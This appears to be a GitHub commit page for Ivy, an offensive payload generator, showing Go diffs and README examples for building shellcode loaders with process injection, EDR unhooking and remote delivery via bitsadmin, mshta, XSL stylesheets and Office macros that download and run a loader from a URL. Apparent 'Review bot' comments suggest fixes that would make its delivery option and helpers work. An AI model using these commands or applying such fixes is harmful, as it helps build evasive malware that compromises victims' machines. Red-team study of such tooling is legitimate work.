v1.11
Tylous committed Jan 28, 2022
1 parent 86bdd82 commit 5d96b43
Showing 4 changed files with 79 additions and 4 deletions.
2 changes: 1 addition & 1 deletion Cryptor/Cryptor.go
Expand Up @@ -69,6 +69,7 @@ func randclassid() string {
}

func VarNumberLength(min, max int) string {
time.Sleep(2 * time.Millisecond)
var r string
rand.Seed(time.Now().UnixNano())
num := rand.Intn(max-min) + min
Expand All @@ -79,7 +80,6 @@ func VarNumberLength(min, max int) string {

func StagelessArrayGen(data []byte) string {
var fmtStr string
//var StrSlice []string
aSlice := data
fmtStr = strings.Repeat("%d, ", len(aSlice)-1)
fmtStr += "%d"
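Review bot: The `time.Sleep(2 * time.Millisecond)` added at the top of VarNumberLength, together with the per-call `rand.Seed(time.Now().UnixNano())` two lines below it, papers over a seeding problem rather than fixing it: reseeding the global generator from the clock on every call means two calls in the same nanosecond yield the same name, and the sleep only makes that less likely while adding latency to every identifier generated. Seed once instead, e.g. a package-level `var rng = rand.New(rand.NewSource(time.Now().UnixNano()))` used as `rng.Intn(max-min) + min`, or drop `rand.Seed` entirely on Go 1.20+, where the global source is seeded automatically and `rand.Seed` is deprecated. Separately, `rand.Intn(max-min)` on the context line below panics when max <= min; a guard such as `if max <= min { max = min + 1 }` would make the helper safe for all argument orders. The rest of VarNumberLength lies outside the hunk.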
4 changes: 3 additions & 1 deletion Ivy.go
Expand Up @@ -91,10 +91,12 @@ Their cries for mercy?
if opt.inputFile32 == "" && opt.inputFile64 == "" {
log.Fatal("Error: Please provide a path to a file containing a raw shellcode or payload")
}

if opt.outFile == "" {
log.Fatal("Error: Please provide a name for the payload the you wish to generate")
}
if opt.CommandLoader == "" || opt.CommandLoader == "bits" || opt.CommandLoader == "hta" || opt.CommandLoader == "macro" || opt.CommandLoader == "xsl" {
log.Fatal("Error: Invalid delivery command option, please choose one of the acceptable options")
}
if opt.inputFile32 != "" && opt.stageless == false {
Utils.PrintDebug(debugging, "Reading payload file %s\n", opt.inputFile32)
rawinputfile32 := Utils.Readfile(opt.inputFile32)
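Review bot: The new delivery-option check `if opt.CommandLoader == "" || opt.CommandLoader == "bits" || ...` reads as inverted: it calls log.Fatal exactly when CommandLoader is empty or one of the four documented values and lets any other string through, so every README example on this page that passes `-delivery bits|hta|macro|xsl` (and every run without `-delivery`) would abort with "Invalid delivery command option". If CommandLoader holds the `-delivery` flag, the condition should be negated: `if opt.CommandLoader != "" && opt.CommandLoader != "bits" && opt.CommandLoader != "hta" && opt.CommandLoader != "macro" && opt.CommandLoader != "xsl" {`. A `switch opt.CommandLoader { case "", "bits", "hta", "macro", "xsl": default: log.Fatal(...) }` would read more clearly and is easier to extend. The enclosing function starts before and continues past this hunk.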
5 changes: 3 additions & 2 deletions Loader/Loader.go
Expand Up @@ -53,6 +53,7 @@ type macro struct {
type sandbox struct {
Variables map[string]string
}

var buffer bytes.Buffer

//First
Expand All @@ -71,7 +72,7 @@ func Java_Code_Buff(product string) (string, string, string, string, string, str
javacode.Variables["DecodedValue"] = Cryptor.VarNumberLength(4, 9)
javacode.Variables["shellcode"] = Cryptor.VarNumberLength(4, 9)
javacode.Variables["Auto_Open"] = Cryptor.VarNumberLength(4, 9)

if product == "Excel" {
struct_option = Struct.Javacode_Start_Excel()
}
Expand Down Expand Up @@ -403,7 +404,7 @@ func XSL_Code_Buff(compiled string) string {
xsl.Variables = make(map[string]string)
xsl.Variables["payload"] = compiled
buffer.Reset()
xslTemplate, err := template.New("xsl").Parse(Struct.HTA_Loader())
xslTemplate, err := template.New("xsl").Parse(Struct.XSL_Loader())
if err != nil {
log.Fatal(err)
}
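Review bot: `var buffer bytes.Buffer` at package level, reset by `buffer.Reset()` inside XSL_Code_Buff (and presumably by the other *_Code_Buff functions in this file), makes every template renderer share one mutable buffer, so the functions are not safe to call concurrently and each caller must finish reading the result before the next renderer runs. A function-local `var buf bytes.Buffer` in place of the package variable removes the shared state and the `Reset()` call with it, at no cost. If `Struct.XSL_Loader()` returns a fixed template string, as the name suggests, the parse error path that ends in `log.Fatal(err)` is really a programmer-error check; a comment such as `// XSL_Loader is a constant template; a parse failure here is a build bug, hence Fatal.` would make that intent explicit. Both functions in this section start and end outside their hunks.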
72 changes: 72 additions & 0 deletions README.md
Expand Up @@ -166,5 +166,77 @@ The delivery command line argument allows you to generate a command or string of
* Macro – This will generate an Office macro that can be put into an Excel or Word macro document. When this macro is executed, the loader will be downloaded from a remote source and executed, then removed.
* XSL - Generates a xsl stylesheet file containing the loader along with a one liner command execute the loader remotely.

# Examples

### Staged Inject payload


```
./Ivy -Ix64 test64.vba -Ix86 test32.vba -P Inject -O SampleInject.js
```

### Staged Local payload
```
./Ivy -Ix64 test64.c -Ix86 test32.c -P Local -O SampleLocal.js
```

### Stagless Local payload
```
./Ivy -stageless -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -O stageless.js
```

### Stagless Injected payload
```
./Ivy -stageless -Ix64 stageless64.bin -Ix86 stageless32.bin -P Inject -O stageless.js
```

### Stagless Injected payload spawning notepad.exe
```
./Ivy -stageless -Ix64 stageless64.bin -Ix86 stageless32.bin -P Inject -process64 C:\\windows\\system32\\notepad.exe -process32 C:\\windows\\SysWOW64\\notepad.exe -O stageless.js
```

### Unhooked Stagless Local payload
```
./Ivy -stageless -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -unhook -O stageless.js
```

### Unhooked Stagless Injected payload
```
./Ivy -stageless -Ix64 stageless64.bin -Ix86 stageless32.bin -P Inject -unhook -O stageless.js
```

## One Liner Commands Samples

### Non-Executable File Types

```
./Ivy -Ix64 stageless64.bin -Ix86 stageless32.bin -P Inject -O test.png -stageless
```

### Bitsadmin Command

```
./Ivy -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -O test.js -url http://ACME.com -delivery bits -stageless
```

### MSHTA.exe Command

```
./Ivy -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -O test.hta -url http://ACME.com -delivery hta -stageless
```


### Stylesheet Payload
```
./Ivy -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -O test.xsl -url http://ACME.com -delivery xsl -stageless
```


### Macro Web Downloader

```
./Ivy -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -O test.txt -url http://ACME.com/test.txt -delivery macro -stageless
```

# Known Issues
Currently there is a known issue with unhooking the remote injected process. A current work around is to load the [unhook](https://github.com/rsmudge/unhook-bof) BOF, for now.
